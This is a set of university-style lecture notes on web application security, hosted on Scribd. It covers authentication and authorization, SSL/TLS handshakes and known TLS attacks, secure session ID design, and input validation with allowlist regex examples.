0% found this document useful (0 votes)
21 views116 pages

Was Notes Final

The document discusses the concepts of authentication and authorization, highlighting their differences and importance in security. Authentication verifies a user's identity, while authorization determines their access permissions. Additionally, it covers Secure Socket Layer (SSL) and Transport Layer Security (TLS) protocols, detailing their functions, features, and the evolution of TLS from SSL.

Uploaded by

shiv10092003a
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
21 views116 pages

Was Notes Final

The document discusses the concepts of authentication and authorization, highlighting their differences and importance in security. Authentication verifies a user's identity, while authorization determines their access permissions. Additionally, it covers Secure Socket Layer (SSL) and Transport Layer Security (TLS) protocols, detailing their functions, features, and the evolution of TLS from SSL.

Uploaded by

shiv10092003a
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 116

Unit-1

AUTHENTICATION AND AUTHORIZATION


Authentication and authorization are the two words used in the security world.
They might sound similar but are completely different from each other.
Authentication is used to authenticate someone's identity, whereas authorization
is a way to provide permission to someone to access a particular resource. These
are the two basic security terms and hence need to be understood thoroughly. In
this topic, we will discuss what authentication and authorization are and how they
are differentiated from each other.

What is Authentication?
o Authentication is the process of identifying someone's identity by assuring
that the person is the same as what he is claiming for.
o Both server and client use it. The server uses authentication when someone
wants to access the information, and the server needs to know who is
accessing the information. The client uses it when he wants to know that it
is the same server that it claims to be.
o The authentication by the server is done mostly by using the username and
password. Other ways of authentication by the server can also be done
using cards, retina scans, voice recognition, and fingerprints.
o Authentication does not ensure what tasks under a process one person can
do, what files he can view, read, or update. It mostly identifies who the
person or system is actually.

Authentication Factors

As per the security levels and the type of application, there are different types of
Authentication factors:
o Single-Factor Authentication
Single-factor authentication is the simplest way of authentication. It just
needs a username and password to allows a user to access a system.
o Two-factor Authentication
As per the name, it is two-level security; hence it needs two-step
verification to authenticate a user. It does not require only a username and
password but also needs the unique information that only the particular
user knows, such as first school name, a favorite destination. Apart from
this, it can also verify the user by sending the OTP or a unique link on the
user's registered number or email address.
o Multi-factor Authentication
This is the most secure and advanced level of authorization. It requires two
or more than two levels of security from different and independent
categories. This type of authentication is usually used in financial
organizations, banks, and law enforcement agencies. This ensures to
eliminate any data exposer from the third party or hackers.

Famous Authentication techniques

1. Password-based authentication

It is the simplest way of authentication. It requires the password for the particular
username. If the password matches with the username and both details match the
system's database, the user will be successfully authenticated.

2. Password less authentication

In this technique, the user doesn't need any password; instead, he gets an OTP
(One-time password) or link on his registered mobile number or phone number.
It can also be said OTP-based authentication.

3. 2FA/MFA

2FA/MFA or 2-factor authentication/Multi-factor authentication is the higher


level of authentication. It requires additional PIN or security questions so that it
can authenticate the user.

4. Single Sign-on

Single Sign-on or SSO is a way to enable access to multiple applications with a


single set of credentials. It allows the user to sign-in once, and it will
automatically be signed in to all other web apps from the same centralized
directory.

5. Social Authentication

Social authentication does not require additional security; instead, it verifies the
user with the existing credentials for the available social network.

What is Authorization?
o Authorization is the process of granting someone to do something. It means
it a way to check if the user has permission to use a resource or not.
o It defines that what data and information one user can access. It is also said
as AuthZ.
o The authorization usually works with authentication so that the system
could know who is accessing the information.
o Authorization is not always necessary to access information available over
the internet. Some data available over the internet can be accessed without
any authorization, such as you can read about any technology from here.

Authorization Techniques
o Role-based access control
RBAC or Role-based access control technique is given to users as per their
role or profile in the organization. It can be implemented for system-system
or user-to-system.
o JSON web token
JSON web token or JWT is an open standard used to securely transmit the
data between the parties in the form of the JSON object. The users are
verified and authorized using the private/public key pair.
o SAML
SAML stands for Security Assertion Markup Language. It is an open
standard that provides authorization credentials to service providers. These
credentials are exchanged through digitally signed XML documents.
o OpenID authorization
It helps the clients to verify the identity of end-users on the basis of
authentication.
o OAuth
OAuth is an authorization protocol, which enables the API to authenticate
and access the requested resources.

Difference chart between Authentication and Authorization

Authentication Authorization

Authentication is the process of Authorization is the process of giving


identifying a user to provide access to a permission to access the resources.
system.

In this, the user or client and server are In this, it is verified that if the user is
verified. allowed through the defined policies and
rules.

It is usually performed before the It is usually done once the user is


authorization. successfully authenticated.

It requires the login details of the user, It requires the user's privilege or security
such as username & password, etc. level.

Data is provided through the Token Ids. Data is provided through the access
tokens.
Example: Entering Login details is Example: After employees successfully
necessary for the employees to authenticate themselves, they can access
authenticate themselves to access the and work on certain functions only as per
organizational emails or software. their roles and profiles.

The user can partially change The user cannot change authorization
authentication credentials as per the permissions. The permissions are given to
requirement. a user by the owner/manager of the
system, and he can only change it.

Conclusion

As per the above discussion, we can say Authentication verifies the user's
identity, and Authorization verifies the user's access and permissions. If the user
can't prove their identity, they cannot access the system. And if you are
authenticated by proving the correct identity, but you are not authorized to
perform a specific function, you won't be able to access that. However, both
security methods are often used together.

SECURE SOCKET LAYER (SSL)




Secure Socket Layer (SSL) provides security to the data that is transferred
between web browser and server. SSL encrypts the link between a web server
and a browser which ensures that all data passed between them remain private
and free from attack.
Secure Socket Layer Protocols:
• SSL record protocol
• Handshake protocol
• Change-cipher spec protocol
• Alert protocol
SSL Protocol Stack:
SSL Record Protocol:
SSL Record provides two services to SSL connection.
• Confidentiality
• Message Integrity
In the SSL Record Protocol application data is divided into fragments. The
fragment is compressed and then encrypted MAC (Message Authentication
Code) generated by algorithms like SHA (Secure Hash Protocol) and MD5
(Message Digest) is appended. After that encryption of the data is done and in
last SSL header is appended to the data.

Handshake Protocol:
Handshake Protocol is used to establish sessions. This protocol allows the client
and server to authenticate each other by sending a series of messages to each
other. Handshake protocol uses four phases to complete its cycle.
• Phase-1: In Phase-1 both Client and Server send hello-packets to each
other. In this IP session, cipher suite and protocol version are
exchanged for security purposes.
• Phase-2: Server sends his certificate and Server-key-exchange. The
server end phase-2 by sending the Server-hello-end packet.
• Phase-3: In this phase, Client replies to the server by sending his
certificate and Client-exchange-key.
• Phase-4: In Phase-4 Change-cipher suite occurs and after this the
Handshake Protocol ends.
SSL Handshake Protocol Phases diagrammatic representation

Change-cipher Protocol:
This protocol uses the SSL record protocol. Unless Handshake Protocol is
completed, the SSL record Output will be in a pending state. After the
handshake protocol, the Pending state is converted into the current state.
Change-cipher protocol consists of a single message which is 1 byte in length
and can have only one value. This protocol’s purpose is to cause the pending
state to be copied into the current state.

Alert Protocol:
This protocol is used to convey SSL-related alerts to the peer entity. Each
message in this protocol contains 2 bytes.

The level is further classified into two parts:


Warning (level = 1):
This Alert has no impact on the connection between sender and receiver. Some
of them are:
Bad certificate: When the received certificate is corrupt.
No certificate: When an appropriate certificate is not available.
Certificate expired: When a certificate has expired.
Certificate unknown: When some other unspecified issue arose in processing
the certificate, rendering it unacceptable.
Close notify: It notifies that the sender will no longer send any messages in the
connection.
Unsupported certificate: The type of certificate received is not supported.
Certificate revoked: The certificate received is in revocation list.

Fatal Error (level = 2):


This Alert breaks the connection between sender and receiver. The connection
will be stopped, cannot be resumed but can be restarted. Some of them are :
Handshake failure: When the sender is unable to negotiate an acceptable set of
security parameters given the options available.
Decompression failure: When the decompression function receives improper
input.
Illegal parameters: When a field is out of range or inconsistent with other
fields.
Bad record MAC: When an incorrect MAC was received.
Unexpected message: When an inappropriate message is received.
The second byte in the Alert protocol describes the error.

Salient Features of Secure Socket Layer:


• The advantage of this approach is that the service can be tailored to
the specific needs of the given application.
• Netscape originated Secure Socket Layer.
• SSL is designed to make use of TCP to provide reliable end-to-end
secure service.
• This is a two-layered protocol.

Versions of SSL:
SSL 1 – Never released due to high insecurity.
SSL 2 – Released in 1995.
SSL 3 – Released in 1996.
TLS 1.0 – Released in 1999.
TLS 1.1 – Released in 2006.
TLS 1.2 – Released in 2008.
TLS 1.3 – Released in 2018.
SSL (Secure Sockets Layer) certificate is a digital certificate used to secure and
verify the identity of a website or an online service. The certificate is issued by
a trusted third-party called a Certificate Authority (CA), who verifies the
identity of the website or service before issuing the certificate.
The SSL certificate has several important characteristics that make it a reliable
solution for securing online transactions:
1. Encryption: The SSL certificate uses encryption algorithms to secure
the communication between the website or service and its users. This
ensures that the sensitive information, such as login credentials and
credit card information, is protected from being intercepted and read
by unauthorized parties.
2. Authentication: The SSL certificate verifies the identity of the
website or service, ensuring that users are communicating with the
intended party and not with an impostor. This provides assurance to
users that their information is being transmitted to a trusted entity.
3. Integrity: The SSL certificate uses message authentication codes
(MACs) to detect any tampering with the data during transmission.
This ensures that the data being transmitted is not modified in any
way, preserving its integrity.
4. Non-repudiation: SSL certificates provide non-repudiation of data,
meaning that the recipient of the data cannot deny having received it.
This is important in situations where the authenticity of the
information needs to be established, such as in e-commerce
transactions.
5. Public-key cryptography: SSL certificates use public-key
cryptography for secure key exchange between the client and server.
This allows the client and server to securely exchange encryption
keys, ensuring that the intended recipient can only decrypt the
encrypted information.
6. Session management: SSL certificates allow for the management of
secure sessions, allowing for the resumption of secure sessions after
interruption. This helps to reduce the overhead of establishing a new
secure connection each time a user accesses a website or service.
7. Certificates issued by trusted CAs: SSL certificates are issued by
trusted CAs, who are responsible for verifying the identity of the
website or service before issuing the certificate. This provides a high
level of trust and assurance to users that the website or service they are
communicating with is authentic and trustworthy.
In addition to these key characteristics, SSL certificates also come in
various levels of validation, including Domain Validation (DV), Organization
Validation (OV), and Extended Validation (EV). The level of validation
determines the amount of information that is verified by the CA before issuing
the certificate, with EV certificates providing the highest level of assurance and
trust to users. For more information about SSL certificates for each Validation
level type, please refer to Namecheap.

TRANSPORT LAYER SECURITY

What is Transport Layer Security?


Transport Layer Security (TLS) is an Internet Engineering Task Force (IETF)
standard protocol that provides authentication, privacy and data integrity
between two communicating computer applications. It's the most widely
deployed security protocol in use today and is best suited for web browsers and
other applications that require data to be securely exchanged over a network.
This includes web browsing sessions, file transfers, virtual private network
(VPN) connections, remote desktop sessions and voice over IP (VoIP). More
recently, TLS is being integrated into modern cellular transport technologies,
including 5G, to protect core network functions throughout the radio access
network (RAN).

How does Transport Layer Security work?


TLS uses a client-server handshake mechanism to establish an encrypted and
secure connection and to ensure the authenticity of the communication. Here's a
breakdown of the process:

1. Communicating devices exchange encryption capabilities.


2. An authentication process occurs using digital certificates to help
prove the server is the entity it claims to be.
3. A session key exchange occurs. During this process, clients and
servers must agree on a key to establish the fact that the secure session
is indeed between the client and server -- and not something in the
middle attempting to hijack the conversation.
How TLS handshake works

TLS uses a public key exchange process to establish a shared secret between the
communicating devices. The two handshake methods are the Rivest-Shamir-
Adleman (RSA) handshake and the Diffie-Hellman handshake. Both methods
result in the same goal of establishing a shared secret between communicating
devices so the communication can't be hijacked. Once the keys are exchanged,
data transmissions between devices on the encrypted session can begin.

History and development of TLS


TLS evolved from Netscape Communications Corp.'s Secure Sockets Layer
protocol and has largely superseded it, although the terms SSL or SSL/TLS are
still sometimes used interchangeably. IEFT officially took over the SSL
protocol to standardize it with an open process and released version 3.1 of SSL
in 1999 as TLS 1.0. The protocol was renamed TLS to avoid legal issues with
Netscape, which developed the SSL protocol as a key part of its original web
browser. According to the protocol specification, TLS is composed of two
layers: the TLS record protocol and the TLS handshake protocol. The record
protocol provides connection security, while the handshake protocol enables the
server and client to authenticate each other and to negotiate
encryption algorithms and cryptographic keys before any data is exchanged.

The most recent version of TLS, 1.3, was officially finalized by IETF in 2018.
The primary benefit over previous versions of the protocol is added encryption
mechanisms when establishing a connection handshake between a client and
server. While earlier TLS versions offer encryption as well, TLS manages to
establish an encrypted session earlier in the handshake process. Additionally,
the number of steps required to complete a handshake is reduced, substantially
lowering the amount of time it takes to complete a handshake and begin
transmitting or receiving data between the client and server.

Another enhancement of TLS 1.3 is that several cryptographic algorithms used


to encrypt data were removed, as they were deemed obsolete and weren't
recommended for secure transport. Additionally, some security features that
were once optional are now required. For example, message-digest algorithm 5
(MD5) cryptographic hashes are no longer supported, perfect forward secrecy
(PFS) is required and Rivest Cipher 4 (RC4) negotiation is prohibited. This
eliminates the chance that a TLS-encrypted session uses a known insecure
encryption algorithm or method in TLS version 1.3.

The benefits of Transport Layer Security


The benefits of TLS are straightforward when discussing using versus not using
TLS. As noted above, a TLS-encrypted session provides a secure authentication
mechanism, data encryption and data integrity checks. However, when
comparing TLS to another secure authentication and encryption protocol suite,
such as Internet Protocol Security, TLS offers added benefits and is a reason
why IPsec is being replaced with TLS in many enterprise deployment situations.
These include benefits such as the following:

• Security is built directly into each application, as opposed to external


software or hardware to build IPsec tunnels.
• There is true end-to-end encryption (E2EE) between communicating
devices.
• There is granular control over what can be transmitted or received on
an encrypted session.
• Since TLS operates within the upper layers of the Open Systems
Interconnection (OSI) model, it doesn't have the network address
translation (NAT) complications that are inherent with IPsec.
• TLS offers logging and auditing functions that are built directly into
the protocol.
The challenges of TLS
There are a few drawbacks when it comes to either not using secure
authentication or any encryption -- or when deciding between TLS and other
security protocols, such as IPsec. Here are a few examples:

• Because TLS operates at Layers 4 through 7 of the OSI model, as


opposed to Layer 3, which is the case with IPsec, each application and
each communication flow between client and server must establish its
own TLS session to gain authentication and data encryption benefits.
• The ability to use TLS depends on whether each application supports
it.
• Since TLS is implemented on an application-by-application basis to
achieve improved granularity and control over encrypted sessions, it
comes at the cost of increased management overhead.
• Now that TLS is gaining in popularity, threat actors are more focused
on discovering and exploiting potential TLS exploits that can be used
to compromise data security and integrity.
Differences between TLS and SSL
As mentioned previously, SSL is the precursor to TLS. Thus, most of the
differences between the two are evolutionary in nature, as the protocol adjusts
to address vulnerabilities and to improve implementation and integration
capabilities.

Key differences between SSL and TLS that make TLS a more secure and
efficient protocol are message authentication, key material generation and the
supported cipher suites, with TLS supporting newer and more
secure algorithms. TLS and SSL are not interoperable, though TLS currently
provides some backward compatibility in order to work with legacy systems.
Additionally, TLS -- especially later versions -- completes the handshake
process much faster compared to SSL. Thus, lower communication latency from
an end-user perspective is noticeable.

Attacks against TLS/SSL


Implementation flaws have always been a big problem with encryption
technologies, and TLS is no exception. Even though TLS/SSL communications
are considered highly secure, there have been instances where vulnerabilities
were discovered and exploited. But keep in mind that the examples mentioned
below were vulnerabilities in TLS version 1.2 and earlier. All known
vulnerabilities against prior versions of TLS, such as Browser Exploit Against
SSL/TLS (BEAST), Compression Ratio Info-leak Made Easy (CRIME) and
protocol downgrade attacks, have been eliminated through TLS version updates.
Examples of significant attacks or incidents include the following:

• The infamous Heartbleed bug was the result of a surprisingly small


bug vulnerability discovered in a piece of cryptographic logic that
relates to OpenSSL'simplementation of the TLS heartbeat mechanism,
which is designed to keep connections alive even when no data is
being transmitted.
• Although TLS isn't vulnerable to the POODLE attack because it
specifies that all padding bytes must have the same value and be
verified, a variant of the attack has exploited certain implementations
of the TLS protocol that don't correctly validate encryption padding
byte requirements.
• The BEAST attack was discovered in 2011 and affected version 1.0 of
TLS. The attack focused on a vulnerability discovered in the
protocol's cipher block chaining (CBC) mechanism. This enabled an
attacker to capture and decrypt data being sent and received across the
"secure" communications channel.
• An optional data compression feature found within TLS led to the
vulnerability known as CRIME. This vulnerability can decrypt
communication session cookies using brute-force methods. Once
compromised, attackers can insert themselves into the encrypted
conversation.
• The Browser Reconnaissance and Exfiltration via Adaptive
Compression of Hypertext (BREACH) vulnerability also uses
compression as its exploit target, like CRIME. However, the
difference between BREACH and CRIME is the fact that BREACH
compromises Hypertext Transfer Protocol (HTTP) compression, as
opposed to TLS compression. But, even if TLS compression isn't
enabled, BREACH can still compromise the session.

Transport Layer Security (TLS) secures web applications, using the


conversation between friends as a relatable example.
TLS as a Secure Conversation
Imagine you and your friend want to have a private conversation, but you're
sitting in a crowded park where anyone could potentially overhear you. TLS
acts like a series of steps and tools you use to ensure that only you and your
friend can understand each other, making your conversation secure from
eavesdroppers and tampering.
Encryption: Scrambling the Conversation
Analogy:
When you talk to your friend, you both use a special code that scrambles your
words in a way that only the two of you can understand. Even if someone else
hears the conversation, they can't make sense of it because they don't know the
code.
Technical Detail:
- Symmetric Encryption: Once the TLS connection is established, both your
web browser (the client) and the website (the server) use the same secret key to
encrypt and decrypt data. This ensures that the data remains confidential and
can only be understood by the intended parties.
- Asymmetric Encryption: Initially, when setting up the connection, the client
and server use a pair of public and private keys to exchange the symmetric key
securely. This process ensures that even if someone intercepts the key
exchange, they cannot decrypt the data without the private key.
Authentication: Verifying Your Friend's Identity
Analogy:
Before you start sharing secrets, you check your friend's ID to make sure it's
really them and not someone pretending to be your friend.

Technical Detail:
- Digital Certificates: The website presents a digital certificate, which is like an
ID card issued by a trusted authority (Certificate Authority or CA). This
certificate contains the website's public key and is digitally signed by the CA.
- Certificate Authorities (CAs): These trusted entities verify the identity of the
website before issuing a certificate, ensuring that the certificate holder is indeed
the legitimate owner of the domain.
- Trust Chain: Your browser trusts the CA, and therefore, it trusts the certificate
issued by the CA. If the certificate checks out, your browser can be confident
that it is communicating with the legitimate website.
Data Integrity: Ensuring the Message Stays Untouched
Analogy:
As you whisper a joke to your friend, you want to make sure no one can change
the punchline halfway. You both agree on a special way to check that the
message hasn't been altered during the exchange.
Technical Detail:
- Message Authentication Codes (MACs): Every message sent between the
client and server includes a MAC, which is a cryptographic hash of the message
content combined with a secret key. This hash acts like a fingerprint for the
message.
- Integrity Check: When the message is received, the recipient recalculates the
MAC and compares it to the one sent with the message. If they match, it
confirms that the message hasn't been tampered with. If they don't match, it
indicates that the message has been altered, and the recipient can reject it.
How TLS Secures Web Applications

Example: Online Shopping:


When you visit an online store and enter your credit card information, TLS
ensures that:
1. Encryption: Your credit card details are scrambled into an unreadable format
as they travel from your browser to the website's server.
2. Authentication: Your browser verifies that it is indeed communicating with
the legitimate online store and not an imposter site.
3. Data Integrity: The details you entered are delivered exactly as you entered
them, without any alterations.
Building Trust with Users

TLS helps build trust between users and web applications by providing:
- Confidentiality: Users can be assured that their sensitive information, such as
login credentials, personal details, and payment information, is protected from
eavesdroppers.
- Authentication: Users can verify that they are interacting with legitimate
websites, protecting them from phishing attacks and fraudulent websites.
- Integrity: Users can trust that the data they send and receive has not been
tampered with during transmission.
Conclusion
Transport Layer Security (TLS) is like a comprehensive toolkit for securing
online communications. By encrypting data, verifying the identities of websites,
and ensuring data integrity, TLS protects users' sensitive information and fosters
a secure and trustworthy online environment. In our increasingly digital world,
TLS is indispensable for maintaining the privacy and security of web
applications, especially when dealing with sensitive transactions and personal
data.

Introduction¶
Web Authentication, Session Management, and Access Control:

A web session is a sequence of network HTTP request and response


transactions associated with the same user. Modern and complex web
applications require the retaining of information or status about each user for the
duration of multiple requests. Therefore, sessions provide the ability to establish
variables – such as access rights and localization settings – which will apply to
each and every interaction a user has with the web application for the duration
of the session.

Web applications can create sessions to keep track of anonymous users after the
very first user request. An example would be maintaining the user language
preference. Additionally, web applications will make use of sessions once the
user has authenticated. This ensures the ability to identify the user on any
subsequent requests as well as being able to apply security access controls,
authorized access to the user private data, and to increase the usability of the
application. Therefore, current web applications can provide session capabilities
both pre and post authentication.

Once an authenticated session has been established, the session ID (or token) is
temporarily equivalent to the strongest authentication method used by the
application, such as username and password, passphrases, one-time passwords
(OTP), client-based digital certificates, smartcards, or biometrics (such as
fingerprint or eye retina).

HTTP is a stateless protocol, where each request and response pair are
independent of other web interactions. Therefore, in order to introduce the
concept of a session, it is required to implement session management
capabilities that link both the authentication and access control (or
authorization) modules commonly available in web applications:

The session ID or token binds the user authentication credentials (in the form of
a user session) to the user HTTP traffic and the appropriate access controls
enforced by the web application. The complexity of these three components
(authentication, session management, and access control) in modern web
applications, plus the fact that its implementation and binding reside on the web
developer's hands (as web development frameworks do not provide strict
relationships between these modules), makes the implementation of a secure
session management module incredibly challenging.

The disclosure, capture, prediction, brute force, or fixation of the session ID will
lead to session hijacking (or side jacking) attacks, where an attacker is able to
fully impersonate a victim user in the web application. Attackers can perform
two types of session hijacking attacks, targeted or generic. In a targeted attack,
the attacker's goal is to impersonate a specific (or privileged) web application
victim user. For generic attacks, the attacker's goal is to impersonate (or get
access as) any valid or legitimate user in the web application.

Session ID Properties

In order to keep the authenticated state and track the users progress within the
web application, applications provide users with a session identifier (session ID
or token) that is assigned at session creation time, and is shared and exchanged
by the user and the web application for the duration of the session (it is sent on
every HTTP request). The session ID is a name=value pair.

With the goal of implementing secure session IDs, the generation of identifiers
(IDs or tokens) must meet the following properties.

Session ID Name Fingerprinting

The name used by the session ID should not be extremely descriptive nor offer
unnecessary details about the purpose and meaning of the ID.

The session ID names used by the most common web application development
frameworks can be easily fingerprinted, such
as PHPSESSID (PHP), JSESSIONID (J2EE), CFID & CFTOKEN (ColdFusion
), ASP.NET_SessionId (ASP .NET), etc. Therefore, the session ID name can
disclose the technologies and programming languages used by the web
application.

It is recommended to change the default session ID name of the web


development framework to a generic name, such as id.

Session ID Length

The session ID must be long enough to prevent brute force attacks, where an
attacker can go through the whole range of ID values and verify the existence of
valid sessions.
The session ID length must be at least 128 bits (16 bytes).

NOTE:

• The session ID length of 128 bits is provided as a reference based on


the assumptions made on the next section Session ID Entropy.
However, this number should not be considered as an absolute
minimum value, as other implementation factors might influence its
strength.
• For example, there are well-known implementations, such
as Microsoft ASP.NET session IDs: "The ASP .NET session identifier
is a randomly generated number encoded into a 24-character string
consisting of lowercase characters from a to z and numbers from 0 to
5".
• It can provide an exceptionally good effective entropy, and as a
result, can be considered long enough to avoid guessing or brute force
attacks.

Session ID Entropy

The session ID must be unpredictable (random enough) to prevent guessing


attacks, where an attacker is able to guess or predict the ID of a valid session
through statistical analysis techniques. For this purpose, a
good CSPRNG (Cryptographically Secure Pseudorandom Number Generator)
must be used.

The session ID value must provide at least 64 bits of entropy (if a


good PRNG is used, this value is estimated to be half the length of the session
ID).

Additionally, a random session ID is not enough; it must also be unique to avoid


duplicated IDs. A random session ID must not already exist in the current
session ID space.

NOTE:

• The session ID entropy is really affected by other external and


difficult to measure factors, such as the number of concurrent active
sessions the web application commonly has, the absolute session
expiration timeout, the amount of session ID guesses per second the
attacker can make and the target web application can support, etc.
• If a session ID with an entropy of 64 bits is used, an attacker can
expect to spend more than 292 years to successfully guess a valid
session ID, assuming the attacker can try 10,000 guesses per second
with 100,000 valid simultaneous sessions available in the web
application.
• More information here.

Session ID Content (or Value)

The session ID content (or value) must be meaningless to prevent information


disclosure attacks, where an attacker is able to decode the contents of the ID and
extract details of the user, the session, or the inner workings of the web
application.

The meaning and business or application logic associated with the session ID
must be stored on the server side, and specifically, in session objects or in a
session management database or repository.

The stored information can include the client IP address, User-Agent, e-mail,
username, user ID, role, privilege level, access rights, language preferences,
account ID, current state, last login, session timeouts, and other internal session
details. If the session objects and properties contain sensitive information, such
as credit card numbers, it is required to duly encrypt and protect the session
management repository.

It is recommended to use the session ID created by your language or


framework. If you need to create your own sessionID, use a cryptographically
secure pseudorandom number generator (CSPRNG) with a size of at least 128
bits and ensure that each sessionID is unique.

Session Management Implementation

The session management implementation defines the exchange mechanism that


will be used between the user and the web application to share and continuously
exchange the session ID. There are multiple mechanisms available in HTTP to
maintain session state within web applications, such as cookies (standard HTTP
header), URL parameters, URL arguments on GET requests, body arguments on
POST requests, such as hidden form fields (HTML forms), or proprietary HTTP
headers.

The preferred session ID exchange mechanism should allow defining advanced


token properties, such as the token expiration date and time, or granular usage
constraints. This is one of the reasons why cookies
(RFCs 2109 & 2965 & 6265) are one of the most extensively used session ID
exchange mechanisms, offering advanced capabilities not available in other
methods.

The usage of specific session ID exchange mechanisms, such as those where the
ID is included in the URL, might disclose the session ID (in web links and logs,
web browser history and bookmarks, the Referer header or search engines), as
well as facilitate other attacks, such as the manipulation of the ID or session
fixation attacks.

Built-in Session Management Implementations

Web development frameworks, such as J2EE, ASP .NET, PHP, and others,
provide their own session management features and associated implementation.
It is recommended to use these built-in frameworks versus building a home-
made one from scratch, as they are used worldwide on multiple web
environments and have been tested by the web application security and
development communities over time.

However, be advised that these frameworks have also presented vulnerabilities


and weaknesses in the past, so it is always recommended to use the latest
version available, that potentially fixes all the well-known vulnerabilities, as
well as review and change the default configuration to enhance its security by
following the recommendations described along this document.

The storage capabilities or repository used by the session management


mechanism to temporarily save the session IDs must be secure, protecting the
session IDs against local or remote accidental disclosure or unauthorized access.

Used vs. Accepted Session ID Exchange Mechanisms

A web application should make use of cookies for session ID exchange


management. If a user submits a session ID through a different exchange
mechanism, such as a URL parameter, the web application should avoid
accepting it as part of a defensive strategy to stop session fixation.

NOTE:

• Even if a web application makes use of cookies as its default session


ID exchange mechanism, it might accept other exchange mechanisms
too.
• It is therefore required to confirm via thorough testing all the
different mechanisms currently accepted by the web application when
processing and managing session IDs and limit the accepted session
ID tracking mechanisms to just cookies.
• In the past, some web applications used URL parameters, or even
switched from cookies to URL parameters (via automatic URL
rewriting), if certain conditions are met (for example, the
identification of web clients without support for cookies or not
accepting cookies due to user privacy concerns).

Transport Layer Security

In order to protect the session ID exchange from active eavesdropping and


passive disclosure in the network traffic, it is essential to use an encrypted
HTTPS (TLS) connection for the entire web session, not only for the
authentication process where the user credentials are exchanged. This may be
mitigated by HTTP Strict Transport Security (HSTS) for a client that supports
it.

Additionally, the Secure cookie attribute must be used to ensure the session ID
is only exchanged through an encrypted channel. The usage of an encrypted
communication channel also protects the session against some session fixation
attacks where the attacker is able to intercept and manipulate the web traffic to
inject (or fix) the session ID on the victim's web browser (see here and here).

The following set of best practices are focused on protecting the session ID
(specifically when cookies are used) and helping with the integration of HTTPS
within the web application:

• Do not switch a given session from HTTP to HTTPS, or vice-versa,


as this will disclose the session ID in the clear through the network.
• When redirecting to HTTPS, ensure that the cookie is set
or regenerated after the redirect has occurred.
• Do not mix encrypted and unencrypted contents (HTML pages,
images, CSS, JavaScript files, etc) in the same page, or from the same
domain.
• Where possible, avoid offering public unencrypted contents and
private encrypted contents from the same host. Where insecure
content is required, consider hosting this on a separate insecure
domain.
• Implement HTTP Strict Transport Security (HSTS) to enforce
HTTPS connections.
It is important to emphasize that TLS does not protect against session ID
prediction, brute force, client-side tampering or fixation; however, it does
provide effective protection against an attacker intercepting or stealing session
IDs through a man in the middle attack

Goals of Input Validation

Input validation is performed to ensure only properly formed data is entering the
workflow in an information system, preventing malformed data from persisting
in the database and triggering malfunction of various downstream components.
Input validation should happen as early as possible in the data flow, preferably
as soon as the data is received from the external party.

Data from all potentially untrusted sources should be subject to input validation,
including not only Internet-facing web clients but also backend feeds over
extranets, from suppliers, partners, vendors or regulators, each of which may be
compromised on their own and start sending malformed data.

Input Validation should not be used as the primary method of


preventing XSS, SQL Injection and other attacks which are covered in
respective cheat sheets but can significantly contribute to reducing their impact
if implemented properly.

Input validation strategies

Input validation should be applied on both syntactical and Semantic level.

Syntactic validation should enforce correct syntax of structured fields (e.g.,


SSN, date, currency symbol).

Semantic validation should enforce correctness of their values in the specific


business context (e.g., start date is before end date, price is within expected
range).

It is always recommended to prevent attacks as early as possible in the


processing of the user's (attacker's) request. Input validation can be used to
detect unauthorized input before it is processed by the application.

Implementing input validation¶

Input validation can be implemented using any programming technique that


allows effective enforcement of syntactic and semantic correctness, for
example:
• Data type validators available natively in web application frameworks
(such as Django Validators, Apache Commons Validators etc).
• Validation against JSON Schema and XML Schema (XSD) for input
in these formats.
• Type conversion (e.g., Integer.parseInt() in Java, int() in Python) with
strict exception handling
• Minimum and maximum value range check for numerical parameters
and dates, minimum and maximum length check for strings.
• Array of allowed values for small sets of string parameters (e.g., days
of week).
• Regular expressions for any other structured data covering the whole
input string (^...$) and not using "any character" wildcard (such
as . or \S)

Allowlist vs Denylist

It is a common mistake to use denylist validation in order to try to detect


possibly dangerous characters and patterns like the apostrophe ' character, the
string 1=1, or the <script> tag, but this is a massively flawed approach as it is
trivial for an attacker to bypass such filters.

Plus, such filters frequently prevent authorized input, like O'Brian, where
the ' character is fully legitimate. For more information on XSS filter evasion
please see this wiki page.

Allowlist validation is appropriate for all input fields provided by the user.
allowlist validation involves defining exactly what IS authorized, and by
definition, everything else is not authorized.

If it's well-structured data, like dates, social security numbers, zip codes, email
addresses, etc. then the developer should be able to define a strong validation
pattern, usually based on regular expressions, for validating such input.

If the input field comes from a fixed set of options, like a drop down list or
radio buttons, then the input needs to match exactly one of the values offered to
the user in the first place.

Validating free-form Unicode text


Free-form text, especially with Unicode characters, is perceived as difficult to
validate due to a relatively large space of characters that need to be allowed.

It's also free-form text input that highlights the importance of proper context-
aware output encoding and quite clearly demonstrates that input validation
is not the primary safeguards against Cross-Site Scripting. If your users want to
type apostrophe ' or less-than sign < in their comment field, they might have
perfectly legitimate reason for that and the application's job is to properly
handle it throughout the whole life cycle of the data.

The primary means of input validation for free-form text input should be:

• Normalization: Ensure canonical encoding is used across all the text


and no invalid characters are present.
• Character categories allow-listing: Unicode allows listing
categories such as "decimal digits" or "letters" which not only covers
the Latin alphabet but also various other scripts used globally (e.g.,
Arabic, Cyrillic, CJK ideographs etc).
• Individual character allow-listing: If you allow letters and
ideographs in names and also want to allow apostrophe ' for Irish
names, but don't want to allow the whole punctuation category.

1. Regular Expression Examples:


- Validating a U.S. Zip Code: `^\d{5}(-\d{4})?$`
- Validating U.S. State Selection:

`^(AA|AE|AP|AL|AK|AS|AZ|AR|CA|CO|CT|DE|DC|FM|FL|
GA|GU|HI|ID|IL|IN|IA|KS|KY|LA|ME|MH|MD|MA|MI|MN|
MS|MO|MT|NE|NV|NH|NJ|NM|NY|NC|ND|MP|OH|OK|OR|P
W|PA|PR|RI|SC|SD|TN|TX|UT|VT|VI|VA|WA|WV|WI|WY)$
`

2. Java Regex Usage Example:


- Defines a regex pattern for validating zip codes and shows how to use it in
Java servlet doPost method.

3. Client-Side vs Server-Side Validation:


- Emphasizes the importance of server-side validation over client-side
validation due to potential security risks with client-side validation bypass.

4. File Upload Validation:


- Highlights practices for securely handling file uploads, including validating
file type, size, and ensuring safe storage and serving of uploaded files.

5. Email Address Validation:


- Mentions syntactic validation using regex and semantic validation through
verification emails to ensure correctness and legitimacy of email addresses.

